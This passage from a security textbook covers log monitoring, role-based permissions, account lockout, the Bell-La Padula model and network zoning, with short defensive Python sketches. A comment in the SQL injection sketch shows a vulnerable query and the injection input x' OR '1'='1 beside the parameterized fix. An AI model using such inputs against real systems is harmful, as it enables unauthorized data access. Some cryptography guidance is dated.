Monitoring audit trails is an important tool for recognizing intruders. Log monitoring is required by security regulations/standards such as HIPAA and PCI DSS. PCI DSS requires daily review of security, payment card, and other critical devices or systems. However, audit logs are voluminous and require professional IT staff to monitor. Audit reduction tools filter important logs and analyze log trends; such tools are known as Security Information and Event Management (SIEM) [9]. Two methods such log analysis tools use include:

• Attack/Signature Detection: A sequence of log events may signal an attack (e.g., 1000 login attempts).
• Trend/Variance Detection: Notices changes from normal user or system behavior (e.g., a login during the night for a daytime employee).
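As a simple illustration of the attack/signature-detection style, the sketch below counts failed logins per account in a log stream and flags accounts exceeding a threshold. The event format and threshold are illustrative assumptions, not those of any particular SIEM product.

```python
from collections import Counter

THRESHOLD = 1000   # e.g., 1000 failed attempts may signal password guessing

def detect_password_guessing(log_events):
    """log_events: iterable of (event_type, login_id) tuples, oldest first."""
    failures = Counter(login for event, login in log_events
                       if event == "LOGIN_FAIL")
    return [login for login, count in failures.items() if count >= THRESHOLD]

events = [("LOGIN_FAIL", "admin")] * 1200 + [("LOGIN_OK", "joan")]
print(detect_password_guessing(events))   # ['admin']
```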

7.3.5 Audit

Management may monitor accountability through internal reports. During an internal or external audit, an auditor should be concerned that information security policies and procedures are thoughtfully documented and implemented, including that authorization is documented and matches reality, and that access follows need-to-know. Workers (employees and volunteers) should be aware of their security responsibilities through regular security awareness training. Data owners and data custodians must implement their responsibility for safeguarding data, and Security Administrators should provide adequate physical and logical security for the information security program, data, and equipment, and monitor logs [16].

7.4 Step 3: Allocating Roles and Permissions

A simple way to start allocating permissions is to use Role-Based Access Control: define the various roles in the organization, and then allocate permissions to those roles [4, 8]. Users are allocated a role (e.g., June is an Accountant) and the role has permissions (Accountant has access to files or records A–C). Permissions can be set at the application, file, form, or attribute-within-form level. Permissions can be


allocated for Create (C), as in creating a new customer or transaction; Read (R), e.g., reading a record; Write (W), changing/editing a record; Execute (X), as in running a program; and Delete (D). Table 7.5 (above) defines three roles for a university, and Table 7.6 defines permissions. These examples are abridged for demonstration purposes only; a complete security design must consider the full scenario, at least within a defined scope.

Roles and permissions are allocated via a Data Owner, traditionally in management. This manager can allocate permissions under their purview, and so can adjust Role-Based Access Control toward Discretionary Access Control in a more personal way. If the Data Owner cannot directly allocate permissions, and instead uses a Security Administrator to allocate them, then these two must ensure that the permission allocation process is secured and cannot be manipulated via social engineering into granting unapproved permissions.

7.5 Advanced: Administration of Information Security

An attacker often needs two pieces of information to obtain entry: a login ID and a password (unless multifactor authentication is used). Commonly named login IDs such as Guest, Administrator, or Admin should be removed or renamed. Very often an attacker will know the login identifier if they know someone's email name. To prevent this, login IDs should follow a confidential internal naming rule.

A password dictionary or brute force attack will lead to multiple incorrect password guesses. When 5–6 incorrect guesses occur in a row, the account should be locked out and a log (or alarm) written. The account can be automatically reinstated some period later (e.g., 1 hour or 1 day). This slows down and discourages the attacker, and notifies the administrator that an attack is occurring. The only account that should never be locked out is the locally accessed administrator account: local administrators, who are on-site, should always be able to get in!

If an attacker becomes an Administrator, they can do anything. If they cannot easily guess an administrator password, perhaps they can get an admin to open an attachment or run an executable on a web page. This gives the attacker one-shot admin permissions, perhaps to copy a password file or install a backdoor for further entry. To prevent this, minimize the number of admin accounts on every system. If you are an administrator, never check your email or search the web using an admin account. Never share your admin account password. The admin password can be kept in a sealed envelope within a locked cabinet, where a manager has the key.

Attackers who are physically present can gain entrance when a victim walks away from their computer without locking it. To minimize this, sessions should time out and require password reentry after a period of 10–15 minutes. In case an attacker does succeed in entering, passwords need to be protected within the system: the password file should be readable only by an administrator, and stored passwords should be strongly encrypted using a one-way algorithm.

Figure 7.3 is an Activity Diagram that shows a workable user lockout algorithm. This activity diagram is a type of flow chart that begins at the black dot on the upper left side. There are two swimlanes showing the actions of the security administrator


on the left, and the end user on the right. Rectangles with rounded edges are actions, and a black diamond indicates a decision point or decision connection point. To follow the logic, start at the black dot and follow the actions and their arrows. Pink rectangles with squared edges are data: they indicate a change in the status of the account, unlocked or locked. The block arrows indicate a communication between the security admin and the user; emails should never contain passwords.

Fig. 7.3  Password lockout algorithm

Single Sign-On is a feature where a user needs only one password to access all systems [8]. This is achievable using a single authentication database, which all systems use to verify logins. It is a preferred technique because of its obvious advantages: one good password replaces many passwords, and IDs are consistent throughout the systems. Single sign-on reduces the possibility that people will write down passwords, and it reduces administrator work in setup and forgotten-password resets. The obvious disadvantage is that a single authentication database is a single point of failure, which can result in total compromise if one system password becomes known. It is also a complex implementation, since it requires reconfiguration of many systems; it may even require software development to implement compatibility. This extra configuration work makes single sign-on time consuming and more expensive.
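Returning to the lockout algorithm of Fig. 7.3, here is a minimal sketch of its core logic. The constants (five attempts, 1-hour automatic reinstatement) are example values from this section; a real implementation would also write a log or alarm, and might require administrator reinstatement instead of a timer.

```python
import time

MAX_ATTEMPTS = 5          # 5-6 consecutive failures trigger lockout
LOCKOUT_SECONDS = 3600    # automatic reinstatement after, e.g., 1 hour

class Account:
    def __init__(self):
        self.failures = 0
        self.locked_until = 0.0   # account status: unlocked

    def try_login(self, password_ok: bool) -> bool:
        now = time.time()
        if now < self.locked_until:
            return False          # account status: locked; reject all attempts
        if password_ok:
            self.failures = 0     # success resets the failure counter
            return True
        self.failures += 1
        if self.failures >= MAX_ATTEMPTS:
            self.locked_until = now + LOCKOUT_SECONDS
            self.failures = 0     # here: write a log entry / alarm the admin
        return False
```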

7.6 Advanced: Designing Highly Secure Environments

The privacy requirements of data are related to trust [10]: how comfortable is a provider of data in sharing data with a data consumer? Medical, financial, and government institutions (such as police and military) rely on consultants and their own


employees to perform certain tasks or share data. Thus, there is a need to hide certain data, while allowing the use of other data for a specifically defined purpose. Statistical data may be permitted, while the personal information from which it is derived may not. Even statistical data, however, can divulge excessive information if the sample size is small.

Trust is also needed in the other direction, from the consumer. Consider that you may want to purchase something on the Internet. You can pay with a debit or credit card, or mail in a check. You may use your work computer, your home/children's computer, or a public library computer. These options likely evoke different levels of confidence that your payment card information is safe; you may trust some options more than others.

Some environments, such as banking, government, and defense, require more substantial levels of trust than other applications, since they demand extremely secure data classifications and suffer greater risks. A component can be trusted when it has verified security mechanisms that cannot be disabled or subverted. This section addresses how to achieve trust when implementing multiple levels of security. The Bell and La Padula Model describes security policies that help to build trust.

7.6.1 Bell and La Padula Model (BLP)

The military follows the Bell and La Padula Model [4]. In the traditional model, objects are assigned a security class. In the BLP model, people are also assigned an Authorization Level, or Level of Trust. The Property of Confinement states that a person can write to a classification level at their level and above (Write Up), and can read at a classification level at their level and below (Read Down). Figure 7.4 shows Joe with a Secret classification, shown in parentheses. Joe can thus write to the Secret and higher classification levels, and read from the Secret and lower classification levels.

There can be issues when a high-level person needs to write orders for lower-level persons. The Tranquility Principle states that an object's class cannot change, while the Declassification Principle enables a subject to lower his or her own class, as an exception to the Write Up rule.

People and objects can also be assigned a subject or domain area. Security classes can then be documented as (S,D) = (sensitivity, domain) for a subject [5]. The Confidentiality Property states that a subject can access an object if the subject dominates the object's classification level. In Fig. 7.5, the woman is assigned a security class of (Secret, Engineer). She can read any code, email, and user documentation within the engineering group.

The BLP model defines security policy, which must be built into secure computing. A Trusted Computing Base (TCB) is a theoretical model for a high-security computer. It has the desirable characteristics of being verified to adhere to security policy, which cannot be evaded or tampered with [5]. The TCB must start with trusted hardware, upon which a trusted operating system is installed [12].


Fig. 7.4  BLP: property of confinement

Fig. 7.5  BLP: confidentiality property

Each application must then be trusted as well. Thus, hierarchical levels are defined, where each layer must be trusted. If each layer were individually constructed, security policy implementations would be duplicated. TCB subsets enable processes to share verified security policy implementations, such as authentication and access control. This is implemented by having applications use TCB security implementations offered by the operating system. This hierarchical layer sharing, using encapsulation of security software, enables applications to achieve shorter time to market through less development and validation, and enables apps to inherit high-security features from the O.S. [13].

However, security must be built in not only vertically, but horizontally. A Top Secret application cannot depend upon a Confidential communications network or a Non-Classified server. A network is a system with many parts. To achieve higher levels of security, all components of a high-security transaction must meet the same security class or level. Vertically, a Secret user must use a Secret-level computer with Secret-level applications and operating system. Horizontally, the network must also be at the Secret level: routers, switches, transmission lines, firewalls, and more. These are called dependencies: any operation at one security class depends upon all parts of the process being at that security class [11]. It is recommended to diagram the dependencies of operations or transactions when implementing security.


One example of a dependency: a system administrator normally performs email operations as a regular user, but logs into a secure account from the user account as necessary to perform administrator duties. Simply logging into an administrator account from a user account is dangerous: user accounts are more likely to be infected with spyware, such as keystroke loggers, which copy password credentials [11]. Storing administrator passwords in a user account file is even more dangerous. These situations demonstrate that extreme care must be taken to ensure all components of a system meet a particular security class.
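The BLP rules of Sect. 7.6.1 reduce to simple comparisons on ordered levels. Below is a minimal sketch, with an assumed four-level ordering, of the confinement and confidentiality checks:

```python
LEVELS = {"Non-Classified": 0, "Confidential": 1, "Secret": 2, "Top Secret": 3}

def can_read(subject: str, obj: str) -> bool:
    """Property of confinement: read down (object at or below own level)."""
    return LEVELS[subject] >= LEVELS[obj]

def can_write(subject: str, obj: str) -> bool:
    """Property of confinement: write up (object at or above own level)."""
    return LEVELS[subject] <= LEVELS[obj]

def dominates(subject_class, object_class) -> bool:
    """Confidentiality property with (sensitivity, domains) classes."""
    s_level, s_domains = subject_class
    o_level, o_domains = object_class
    return LEVELS[s_level] >= LEVELS[o_level] and o_domains <= s_domains

assert can_read("Secret", "Confidential") and can_write("Secret", "Top Secret")
assert dominates(("Secret", {"Engineer"}), ("Confidential", {"Engineer"}))
```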

7.7 Questions

1. Vocabulary. Match each meaning with the correct vocabulary name:

Access control, Secure wiping, Process owner, Authentication, Defense-in-depth, False rejection rate, Biometrics, Integrity, Data owner, Availability, Least privilege, Confidentiality, Mandatory access control, Discretionary access control, Multifactor authentication, Sensitivity classification, False acceptance rate

(a) Persons have the ability to do their primary job and no more.
(b) The security goal that data shall remain secret except to qualified persons.
(c) The probability that a biometric system incorrectly identifies an unenrolled user.
(d) A data owner can configure permissions to users as a subset of their own permissions.
(e) The security goal that data is accurate.
(f) A cracker would need to penetrate multiple security controls to succeed in an attack.
(g) Overwriting disk contents with a pattern to hide confidential information before disk disposal.
(h) A person authorized to distribute permissions.
(i) The set of categories defining the level of confidentiality of business information.
(j) The security goal that data is accessible when needed by authorized persons.

2. Workbook Solution for Specific Industry. Consider an industry you currently work in or would like to work in. Assume the company is in your geographical region. You may use the Security Workbook, Information Security chapter, to complete the tables. For each table, include five or more information or asset types, and at least three roles.


(a) Create a Sensitivity Classification Table, similar to Table 7.1.
(b) Create a Handling of Sensitive Data Table, similar to Table 7.2.
(c) Create an Asset Inventory Table, similar to Table 7.3.
(d) Create a Table of Roles, similar to Table 7.5.
(e) Create a Role-Based Access Control Table, similar to Table 7.6.

3. Biometric Devices. Look up websites for three different biometric tools. What security services do they provide, and at what price?

7.7.1 Health First Case Study Problems

For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material.

Case study | Health first case study | Other resources
Designing information security | √ | Security workbook, Health first requirements doc (optional)

References

1. Macy J, Brown MY (1998) Coming back to life. New Society Publishers, Gabriola Island, p 41
2. Gottshall JY (2013) Security, privacy, and whistleblowing. SC Congress, Chicago
3. PCI Security Standards Council (2013) Requirements and security assessment procedures, v 3.0, November 2013. www.pcisecuritystandards.org
4. Harris S (2013) All-in-one CISSP® exam guide, 6th edn. McGraw-Hill, New York, pp 109–112, 120–124, 219–226, 369–371
5. Smith R (2013) Elementary information security. Jones & Bartlett Learning, Burlington, pp 773–780
6. Grama JL (2011) Legal issues in information security, 2nd edn. Jones & Bartlett Learning, Burlington, pp 188–213
7. Liulevicius VG (2011) Espionage and covert operations: a global history. The Great Courses, Chantilly, lecture 24
8. ISACA (2010) CISA review manual 2011. ISACA, Arlington Heights, pp 320–326, 337–342
9. Stephenson P, Hanlon J, O'Connor K (2014) Product section: SIEM. SC Mag, Haymarket Media 25(3):35–49
10. Bisdikian C, Sensoy M, Norman TJ, Srivastava MB (2012) Trust and obfuscation principles for quality of information in emerging pervasive environments. In: The 4th international workshop on information quality. IEEE, http://ieeexplore.ieee.org, pp 44–49
11. Johansson JM (2014) Security watch island hopping: mitigating undesirable dependencies. http://technet.microsoft.com/en-us/magazine/2008.02.securitywatch.aspx. Accessed 14 Feb 2014


12. Li Y, Zhang X (2010) A trust model of TCB subsets. In: IEEE proceedings of the 9th international conference on machine learning and cybernetics. IEEE, pp 2838–2842
13. Vetter L, Smith G, Lunt TF (1989) TCB subsets: the next step. In: Fifth annual computer security applications conference. IEEE, pp 216–221
14. ISACA (2020) CDPSE™ review manual. ISACA, Schaumburg
15. Granlund D, Åhlund C (2011) A scalability study of AAA support in heterogeneous networking environments with global roaming support. In: 2011 international joint conference of IEEE TrustCom-11. IEEE, New York
16. ISACA (2019) CISA® review manual, 27th edn. ISACA, Arlington Heights

Chapter 8

Planning for Network Security

There is a reason why BlackBerries and iPhones are not allowed in the White House Situation Room. We know that the intelligence services of other countries – including some who feign surprise over the Snowden disclosures – are constantly probing our government and private sector networks, and accelerating programs to listen to our conversations, and intercept our emails, and compromise our systems. – Pres. Barack Obama, Jan. 17, 2014 [1]

The Internet allows attackers anywhere in the world to attack from their home desks. They need to find only one vulnerability, while a security analyst needs to close every vulnerability. If that sounds nearly impossible to defend against, then implement defense in depth: many layers require an attacker to penetrate multiple levels of security to succeed. In Chap. 7 on Information Security, we classified information assets and defined how each class of assets should be protected. In this chapter, we implement that classification system in the network.

8.1 Important Concepts

Network security builds on the concepts introduced in the Information Security chapter, including defense in depth and least privilege. A defense in depth should have many layers, similar to an onion. The multiple layers in an IT network should include: firewall, antivirus, authentication, strong encryption, access control, logged problems, etc. To achieve least privilege, firewalls, servers, and computers should be configured to support the minimum required applications and no more (providing fewer features to attack!).

It is important to understand how hackers attack, to better defend against them. The next section describes how attacks on computer systems and networks occur. The first line of defense for network security is the packet filter, which is explained before starting the design. Additional controls to establish defense in depth are defined later in the chapter.


8.1.1 How Crackers Attack

Chapter 1 introduced some of the tools and techniques crackers use to attack an organization. This chapter goes into more depth on the network tools used in attacks. Stages of an attack can include [2–4]:

1. Target Identification: Attackers may choose to perform an opportunistic or targeted attack. An opportunistic attack focuses on any site that may be easy to break into (playing the odds); a targeted attack has a specific victim in mind, and searches for a vulnerability that will work.

2. Reconnaissance: Like a bank robber who might case a bank before a robbery, a cracker may investigate an organization before attacking. Social techniques include dumpster diving, web searches for additional information (Google, news, web sites), and social engineering. Example network investigation techniques include:

• WhoIs Service: Querying this database to find system administrator and Internet information relating to a specific organization.
• War Driving: Driving (or walking) around to find an internal wireless local area network to connect to. This may include MAC spoofing, where a criminal adopts another person's WLAN or MAC identification to connect to the network, and hijacking, where they take over that person's connection.
• War Dialing: An intruder dials phone numbers associated with an organization to find a modem to connect to.
• Protocol Sniffing: Observing packet transmissions, which is easy with unencrypted or poorly encrypted wireless LANs.
• Network Scanning: Polling computer IP addresses to determine which devices exist, and for each device, the type of computer (e.g., server, point of sale, user terminal) and its operating system and applications (TCP/UDP 'port' addresses). Enumeration includes scanning each port (or application) on each computer to learn which applications exist and respond to connection requests.
• Network Traffic Analysis: Observing traffic patterns. Encryption can hide data contents, but it does not hide the amount of data sent and where data is being sent, including which specific applications are being used at which IP addresses.
• Domain Name Server Interrogation: Abusing the IP name translation system to obtain information about a network.

3. Gaining Access: In this stage the cracker gains entrance into a computer via social engineering or hacker tool attacks. Once they achieve access to an internal system, the crackers may launch attacks toward their intended target, such as a server or point-of-sale device. Often, the initial access is obtained via spear phishing (directed fraudulent email) [4]. Other initial or progressive attacks include:

• Scanning for Vulnerabilities: Determining the system type, then checking for Common Vulnerabilities and Exposures (CVEs, or known bugs)


• Remote Code Execution: Remote desktop (with credentials) enables execution of code on target servers.
• Watering Hole Attack: Criminals take advantage of unpatched software in public websites to infect those websites with malware.
• Man-in-the-Middle Attack: An attacker spoofs, or pretends to be, the desired destination. The spoofer forwards all communications between the victim and the desired endpoint, hiding the attack but gaining valuable information. For example, an attacker may create a wireless local area network access point that pretends to be an organizational access point. The rogue access point forwards information between the victim and the real access point, copying credentials and other information.
• SQL Injection Attack: Attackers manipulate web form input to modify the database commands implemented within the form. Database manipulations may include adding commands (e.g., delete file or show all) or modifying commands (e.g., to make an invalid password look like a valid one). A parameterized-query defense is sketched after this list.
• Password Guessing: Attackers may use password dictionaries or brute force attacks to guess login credentials.

4. Hiding Presence: A rootkit is a set of malware that hides the attacker's actions. System utilities or the operating system are modified to hide the attacker's actions; logs are modified or prevented from writing certain alarms.

5. Establishing Persistence: Attackers install Command and Control software, which enables them to remotely control the computer. The attacker may weaken security by establishing a backdoor, a mechanism for later entry into the system. Often they escalate their access capabilities by installing a keystroke logger or copying the password file.

6. Execution: Intruders may target financial information, trade secrets, or personally identifiable information. Exfiltration of sensitive data can be concealed, as a covert channel, by transmitting the data within an innocuous data stream, such as web output, or hidden within a video or graphics file transmission (steganography). In addition to copying information, the attacker may use the newly acquired machine as a bot, or launch one or more attacks on an internal system or someone else's system (e.g., Distributed Denial of Service, ransomware).

7. Assessment: What went right and wrong? Learn from mistakes.
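The standard countermeasure to the SQL injection attack above is to pass user input as bound parameters rather than pasting it into the query text. Here is a minimal Python sketch, using the standard library's sqlite3 module with a hypothetical users table:

```python
import sqlite3

def find_user(conn: sqlite3.Connection, username: str):
    # VULNERABLE: input such as  x' OR '1'='1  would rewrite the query:
    #   conn.execute(f"SELECT * FROM users WHERE name = '{username}'")

    # SAFE: a parameterized query treats input strictly as data, never as SQL.
    cur = conn.execute("SELECT * FROM users WHERE name = ?", (username,))
    return cur.fetchone()
```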

8.1.2 Filtering Packets to Restrict Network Access

The concept of least privilege extends to network security. Firewalls and routers have a filtering capability that should be configured to permit only approved applications or services to enter the network. Figure 8.1 shows how a network filter permits only packets for certain applications, source/destination addresses, and packet types (requests versus responses). Source/destination address filtering uses the Internet Protocol (IP) address, while applications are filtered using the Transport Control Protocol (TCP) or User Datagram Protocol (UDP) port address.


Fig. 8.1  The role of the network filter

When these routing devices fail, such as during a DoS attack, they can either pass packets indiscriminately or fully restrict access. A fail-closed or fail-secure implementation ensures that no packets pass through, protecting the network from additional attacks; firewalls should fail closed. Additional capabilities of firewalls are discussed in the Advanced section of this chapter. A fail-open or fail-safe implementation assumes that if, for example, a door were to fail, it should fail unlocked. This would normally not be good for security, but it applies to doors when there is a fire: people must be able to exit through a locked door in case of fire, and thus doors fail open (fail safe).
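The sketch below illustrates first-match packet filtering with a fail-closed default: anything not explicitly permitted is dropped. The addresses and rules are illustrative (they use documentation IP ranges), not a real firewall configuration.

```python
from dataclasses import dataclass

@dataclass
class Packet:
    src_ip: str
    dst_ip: str
    protocol: str   # "TCP" or "UDP"
    dst_port: int

# First-match rule list: permit only approved services (least privilege).
RULES = [
    (lambda p: p.protocol == "TCP" and p.dst_ip == "203.0.113.10"
               and p.dst_port == 443, "ACCEPT"),                  # HTTPS to web server
    (lambda p: p.protocol == "UDP" and p.dst_port == 53, "ACCEPT"),   # DNS
]

def filter_packet(p: Packet) -> str:
    for matches, action in RULES:
        if matches(p):
            return action
    return "DROP"    # default deny: the filter fails closed

assert filter_packet(Packet("198.51.100.7", "203.0.113.10", "TCP", 443)) == "ACCEPT"
assert filter_packet(Packet("198.51.100.7", "203.0.113.10", "TCP", 23)) == "DROP"
```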

8.2 Defining the Network Services

As part of the network security design, we first need to establish what the legal transactions are and from which devices they may arise. Second, we classify those services using sensitivity and criticality classes. Third, we separate our network into zones, with sufficient filters (or firewalls) to allow legal transactions and to detect and reject illegal transactions. Fourth, we define controls for each zone to adequately meet the security requirements of the services. Finally, we draw a diagram of our full network, showing zones and classifications.

8.2.1 Step 1: Inventory Services and Devices: Who, What, Where?

We want to permit only legal transactions within our network. We consider:

• Which services will we support in our network?
• Which internal services can be accessed from the outside (i.e., the Internet)?


• Which external services (in the Internet) can be accessed from the internal network?
• Who and where (from the inside and outside) can access these permitted services?
• What devices are permissible in our network?

By carefully answering these questions and configuring the network accordingly, a form of network access control is implemented.

Fig. 8.2  Informal sketch of logical access

Figure 8.2 is an informal diagram showing who can access the basic services of a university. The big gray circle represents the campus; faces outside the circle are off-campus. Databases are shown as cylinders, which are color-coded to reflect their sensitivity class: black = confidential, gray = privileged, and white = public. Faces represent different people, and arrows point in the direction that the service will be requested. This informal diagram shows that only on-campus nurses have access to the nurse database. Students and instructors have access to the Learning Management System and the Registration system, but on-campus students can also access the lab and library resources. Off-campus students may access library resources via login. This diagram does not show that students and instructors can access any web site on the Internet; however, that is reflected in the last row of Table 8.1 below, which documents the logical access sketched informally in Fig. 8.2.

8.2.1.1 Inventorying Devices

It is also important to inventory the permissible devices in the network [19]. In a university environment, student devices are unpredictable and are not inventoried, but they are only allowed in special lab or dorm areas. Even public labs should verify that network devices are valid, to avoid rogue wireless access


Table 8.1  Identifying sources and destinations for services (workbook exercise)

Service (e.g., web, sales database) | Source (e.g., home, world, local computer) | Destination (local server, home, world, etc.)
Registration, learning management | Students and instructors: anywhere in the world | Computer service servers
Registration | Registrars and advisers: on campus | Computer service servers
Library databases | On-campus students and staff; off-campus requires login | Specific off-site library facilities
Health services | On campus: nurses office | Computer service servers
External (Internet) web services | On campus: campus labs, dorms, faculty offices | Anywhere in the world

From this information we determine who can access what, from where.

points. Other, more secure parts of the university network shall ensure that only specific, controlled devices are permitted on those LANs. Within more controlled networks, only controlled devices with limited software and configurations may be permitted [19]. Access in Table 8.1 may be restricted to a limited set of software. In a university environment, even faculty are permitted additional software beyond this table. However, higher-risk environments, such as financial, medical, government, and utility organizations, should have very strict requirements regarding allowed software and configurations. Also, certain network zones in a university (e.g., payment card zones) should strictly control software, devices, and configurations.

8.2.2 Step 2: Determine Sensitivity of Services

If attackers break into one computer in a network, they are likely to escalate their attack to other servers in that network region. Similarly, if an attacker breaks into one service, they are likely to break into other services on the same physical server. Compartmentalization, or separation, partitions a network and its services to provide protection between them. To achieve compartmentalization, a network is divided into regions, domains, or 'zones' using firewalls, and different services are isolated onto different physical or virtual servers. The intention is that by separating different services, persons with (for example) manufacturing permissions cannot easily access or infiltrate engineering, sales, finance, or personnel data.

Allocating one service per physical server is very secure, but also expensive, since it requires many physical servers. A safer way to consolidate services on one physical server is to isolate services onto different virtual servers, which are then combined onto one physical server. Each virtual (or logical) server has its own operating system and access to a limited section of disk. Virtual systems are built using products like VMware. Virtual machines use software called a


Table 8.2  Partial service classifications and roles for a university (workbook exercise)

Service name (e.g., web, email) | Sensitivity class (e.g., Confidential) | Roles (e.g., sales, engineering) | Server (*=Virtual)
Learning management | Privileged | Current students, instructors | StudentScholastic
Registration | Confidential | Current students, registration, accounting, advising, instructors | Student_Register
Health service | Confidential | Nurses | Health_Services
Web pages: activities, news, departments, … | Public | Students, employees, public | Web_Services*

hypervisor to interface the virtual system's operating system to the real computer's operating system or hardware.

Compartmentalization is achieved by grouping similar assets together. The decision of whether services (or applications) should be combined or separated must consider: (1) the data's sensitivity classifications, (2) the roles that may access the service, and (3) the probability of any specific service being attacked. For example, email is a service highly likely to be attacked, and should not be housed with sensitive services. A good network architecture will encapsulate one main function within each compartment, creating simplicity in design through modularity and isolation.

In Table 8.2, university services are divided by their sensitivity classes and roles. Confidential services are protected by law, and should be in a separate network region/zone from other services. Public services, such as public web, email, and domain name server (DNS), are susceptible to attacks from the world and should be separated from any internal (Privileged) services. Registration and Health Services are both Confidential, but are accessed by very different roles; therefore, they should be separated into different network zones or servers. Here they will be hosted on separate physical servers. Different web services, however, could be hosted on different virtual servers on the same physical server.

8.2.3 Step 3: Allocate Network Zones

A network is compartmentalized into regions called zones. Simplicity of design and encapsulation allocate one main function to each zone. Each region corresponds to a related sensitivity class, set of access roles, and accessibility. Accessibility refers to the probability of being broken into: networks with wireless access, the Internet, and public services are higher risk. A Demilitarized Zone (DMZ) is a region in a network that is accessible to the public, e.g., for web and e-mail services. A Confidential Payment Card Zone is the zone required by PCI DSS when payment card systems are used, such as point-of-sale or ATM machines [5]. One or more


protected zones will restrict public access. Larger organizations have (at least) one zone per functional area: e.g., manufacturing, engineering, personnel. In Table 8.3 (also available in the Workbook, Network Security section), you may add or delete zones as necessary.

Firewalls/routers implement compartmentalization by serving as the guards between zones. They limit or filter the application transactions that enter and leave individual network zones. Many firewalls/routers can handle a set of zones. Table 8.3 lists a set of zones for the university configuration. The Confidential Payment Card Zone has been renamed the Confidential Zone, since payment card information is collected via the Internet rather than point-of-sale machines; in addition, this zone holds grade and health information. Wireless and Internet zones are both very high risk, and are given strong filters. Private user and server zones are separated, since user zones will periodically acquire malware, and server zones need to be well protected against it. Technical experts can take this table, learn more about the normal operations of each application, and configure the firewall(s) to permit only legal packets per zone.

Table 8.3  Creating zones (workbook exercise)

Zone | Services | Zone description (you may delete or add rows as necessary)
Internet (external) | – | This zone is external to the organization
De-militarized zone | Web, Email, DNS | This zone houses services the public are allowed to access in our network
Wireless network | Wireless local employees | This zone connects wireless/laptop employees/students (and possibly crackers) to our internal network. They can access select university databases, any Internet web site, email, and personal files
Privileged server zone | Databases | This zone hosts our faculty servers and student servers
Confidential zone | Payment card, health, registration info | This highly-secure zone hosts databases with payment and other confidential (protected by law) information
Privileged user zone | Wired students/employees | This zone hosts our wired/fixed employee/classroom computer terminals. They can access select university databases, any Internet web site, email, and personal files
Student lab zone | Student labs | This zone hosts our student lab computers, which are highly vulnerable to malware. They can access select university databases, any Internet web site, email, and personal files
Remote cloud configuration | Learning management system | This database is maintained with a high-availability cloud configuration


8.2.4 Step 4: Define Controls

Four types of network controls are shown in Fig. 8.3. In these mini-diagrams, Joe sends information to Ann, but attacker Bill interferes. The controls include:

• Confidentiality ensures unauthorized parties cannot access information. Example controls include secret key encryption.
• Authenticity ensures that the actual sender is the claimed sender. It counters masquerading or spoofing, where the sender pretends to be someone else. Example controls include public key encryption and digital certificates.
• Integrity ensures that the message was not modified during transmission. Example controls include hashing, SHA-3, and HMAC.
• Nonrepudiation ensures that the sender cannot deny sending a message at a later time. Nonrepudiation is important in signing contracts and making payments. Example controls include the digital signature.

Table 8.4 adds controls for each zone or service. Controls for each control type are described in the next section. An IT professional should configure the firewall/router based on this table.

8.3 Defining Controls

Techniques for each of the four network controls (confidentiality, authenticity, integrity, and nonrepudiation), in addition to hacker-recognition tools, are described in turn next.

Fig. 8.3  Objectives for network controls


Table 8.4  Controls for services (workbook exercise)

Zone | Server (*=Virtual) | Service | Required controls (conf., integrity, auth., nonrepud., with tools: e.g., encryption/VPN, hashing, IPS)
Internet (external) | – | – | –
De-militarized zone | Web_Services*, Email_Server, DNS_Server | Web, Email, DNS | Hacking: intrusion prevention system, monitor alarm logs, antivirus software within email package
Wireless network | – | Wireless local users | Confidentiality: WPA3 encryption. Authentication: WPA3 authentication
Privileged server zone | StudentScholastic, Student_Files, Faculty_Files | Classroom software, faculty & student storage | Confidentiality: secure web (HTTPS), secure protocols (SSH, SFTP). Authentication: single sign-on through TACACS. Hacking: monitor logs
Confidential zone | Student_Register, Health_Service | Payment card, grade, health info | Confidentiality: encrypted disks, secure web (HTTPS), VPN for health services. Authentication: public key infrastructure. Integrity: SHA-3 checksums on all info. Hacking: intrusion prevention system, monitor logs
Privileged user zone | – | Faculty, classrooms, employees | Confidentiality (instructor/employee computers): encrypted disks. Secure protocols: SSH. Hacking: antivirus software
Student lab zone | – | Student labs | Hacking: recently imaged computers for labs

8.3.1 Confidentiality Controls

Encryption provides confidentiality by transforming data into a form unreadable to anyone without the encryption key. Encryption is critical for safely sending credit card and other private information and for securing organizational secrets. The security of an encryption algorithm depends heavily on both the length and complexity of the key (in bits) and the complexity and number of encryption operations performed (in rounds). Encryption algorithms are categorized into secret-key and public-key types. These encryption algorithms are then used in specific protocols to protect applications such as web, file transfer, remote login, etc. This section reviews the two types of encryption algorithms, introduces popular algorithms for each, and then reviews the encrypted application protocols.


Secret Key Encryption  Both sender and receiver share a common, secret key. These encryption algorithms are very efficient and popular. The issue is how to share the common secret key without also disclosing it to others. Popular algorithms include [3, 6, 14]:

• Advanced Encryption Standard (AES): This encryption standard is more secure than 3DES and sufficient to protect sensitive but unclassified U.S. government information. Key sizes include 128, 192, and 256 bits, with 10–14 rounds of encryption. This block cipher separates data into fixed 128-bit or variable blocks, and each block is separately encrypted. Approved configurations include specific confidentiality modes.
• Triple Data Encryption Standard (3DES): The 1977 DES algorithm is a block cipher with a block size of 64 bits and 16 rounds. A single DES encryption is regarded as insufficient, but when three DES operations use three different 56-bit keys, the result is safe encryption. The DES-EDE3 algorithm encrypts the plaintext packet using key 1, decrypts the result using key 2, and encrypts again using key 3, to obtain the ciphertext:

Ciphertext = Encrypt(Key3, Decrypt(Key2, Encrypt(Key1, Plaintext)))    (8.1)

The EDE3 name is abbreviated from 'Encrypt, Decrypt, Encrypt using 3 keys'. Other algorithms similarly abbreviated include EEE3, EEE2, and EDE2. Certain versions are approved for various applications by NIST [14].

• International Data Encryption Algorithm (IDEA): A European encryption algorithm that uses a 128-bit key, meant to replace DES.
• RC4 or ARC4: This is a stream cipher, where a key is used to generate a random bit pattern, which is exclusive-ORed (XOR) with the data. RC4 is used in SSL/TLS and WPA protocols.

Public-Key Encryption  The sender and receiver keys are complementary, but not identical. Every entity (person or organization) has their own public and private keys. The public key can be advertised to the world; the corresponding private key is never shared. The property of public-key encryption is that plaintext encrypted with the public key must be decrypted with the private key, and vice versa: plaintext encrypted with the private key must be decrypted with the public key:



Plaintext = Decrypt(KeyPub, Encrypt(KeyPriv, Plaintext))    (8.2)

Plaintext = Decrypt(KeyPriv, Encrypt(KeyPub, Plaintext))    (8.3)

Therefore, people who know your public key can send you encrypted messages that only you can read with your private key, which only you have access to. This is highly advantageous, because it eliminates the need to privately communicate a secret key between two users, which is the flaw of secret key encryption.
